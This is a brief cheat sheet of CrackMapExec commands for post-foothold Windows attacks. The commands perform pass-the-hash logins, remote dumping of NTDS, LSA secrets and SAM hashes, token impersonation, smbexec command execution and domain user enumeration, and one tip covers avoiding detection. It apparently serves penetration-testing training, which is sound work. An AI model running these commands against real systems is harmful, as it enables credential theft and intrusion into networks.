Crackmapexec
CrackMapExec
CrackMapExec is a post-foothold tool used for lateral movement and privilege escalation. It can be used to dump the LSA, SAM, and perform Pass-the-Hash (PtH) attacks.
Basic Usage
Using NTLM hash to authenticate and list shares
crackmapexec smb 192.168.1.100 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 --sharesExecute commands with hash
crackmapexec smb 192.168.1.100 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -x whoamiCommon Operations
Capturing the NTDS
crackmapexec smb 10.129.201.57 -u bwilliamson -p P@55w0rd! --ntdsDumping LSA Secrets Remotely
crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --lsaDumping SAM Remotely
crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --samToken Manipulation
Using the tokens module
crackmapexec smb 192.168.1.100 -u Administrator -p 'Password123' -M tokensImpersonating a user
crackmapexec smb 192.168.1.100 -u Administrator -p 'Password123' --impersonate-user domain\targetuserCommand Execution
SMBEXEC Method
crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexecUser Enumeration
Enumerating Logged-on Users
crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-usersAdvanced Techniques
Pass-the-Hash (PtH)
crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FEGetting Password Policies
crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --pass-polEnumerating Domain Users
crackmapexec smb 172.16.5.5 --usersUsing Valid Credentials to Enumerate Users
crackmapexec smb 172.16.5.5 -u htb-student -p Academy_student_AD! --usersTips
Use
--continue-on-successto continue after finding a good credential comboFor mass scanning, consider rate-limiting to avoid detection
Always test in controlled environments before using in real engagements
Last updated